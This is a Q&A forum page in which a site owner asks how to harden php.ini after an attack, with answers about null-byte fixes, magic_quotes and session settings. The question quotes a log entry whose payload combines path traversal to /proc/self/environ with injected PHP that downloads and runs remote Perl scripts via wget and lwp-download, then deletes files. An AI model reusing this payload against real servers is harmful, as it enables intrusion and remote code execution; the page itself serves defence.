7

My website have been attacked and I need a best practice for a php.ini I have done some reading but I am still not sure if I covered most of the options.

here is my settings:

file_uploads = Off
upload_tmp_dir = /var/php_tmp
upload_max_filezize = 0M
allow_url_fopen = Off
allow_url_include = Off
safe_mode = On
display_errors = Off
magic_quotes_gpc = On
magic_quotes_runtime = On
max_file_uploads=0

here is what I got error log from the webhost company:

121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http://some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"
Scott Pack
  • 15,217
  • 5
  • 62
  • 91
TryHarder
  • 257
  • 4
  • 9

2 Answers2

3

First of all, this attack will not work on the latest 5.3 branch because null byte poisoning attacks have been fixed for file-io functions. That being said none of your settings will defend against these attacks except for magic_qutoes_gpc in some edge cases because the null byte will be escaped. Although to be honest I would disable magic_qutoes_gpc, you should not rely upon it for security and more often than not it will malform user input. magic_quotes_gpc is being removed in php6.

To make sure php is configured properly you should run PHPSecInfo. You should also remove the write bit from your entire web root, and remove file_privs from your mysql account. Here is more information for locking down php.

rook
  • 47,004
  • 10
  • 94
  • 182
  • Thank you very much indeed your precise answer. This why I asked here. My provider just could not say a word. Thanks again. (I am not wise:) enough to rank you up yet:) but I would. – TryHarder Sep 13 '11 at 07:12
  • Note the referer header, that's the more interesting attack in this example, see the answer on the [very similar question](http://security.stackexchange.com/questions/7080/how-to-find-and-protect-against-the-exploited-vulnerability-in-an-php-application/7095#7095). – Hendrik Brummermann Sep 13 '11 at 11:28
  • @Rook Thanks again, I have just spotted out your answer and I tried my code with php5.3 and suddenly I got 500 error. so something definitely wrong... any idea? thanks – TryHarder Sep 13 '11 at 19:45
1

This might help someone.

expose_php = off
disable_functions = phpinfo
session.auto_start = 0
session.cookie_httponly = 1
session.cookie_secure = 1
session.name = sessId
session.hash_function = sha256
session.hash_bits_per_character = 5
Gilles 'SO- stop being evil'
  • 51,415
  • 13
  • 121
  • 180
Praveen V
  • 11
  • 2
  • 2
    welcome to the site and thanks for your answer. But could you format it a little better and maybe add some details about your suggestions? – Mark Davidson Dec 05 '12 at 09:03
  • 2
    It would be more helpful if you explained what these settings are supposed to do. – Gilles 'SO- stop being evil' Dec 05 '12 at 11:07
  • expose_php =off - Will not expose php and it's version. You can even change the extensions of files to .html which would hide the app is using PHP. disable_functions = phpinfo(); - – Praveen V Dec 06 '12 at 05:59
  • Contd...disable_functions = phpinfo(); - Will disable the in-built function phpinfo which displays PHP version,details of PHPconfig. session_auto_start = 0 - Which will turn off the session start auto. session.name -> Can rename the session name which appears client side (When you view it in browser's firebug panel -> net tab -> HTML tab -> Request Headers-> Cookie-> SessionName & SessID) sessionHashFunction which will hash the sessionId.5 indicates noofchar's used/sessID. – Praveen V Dec 06 '12 at 06:07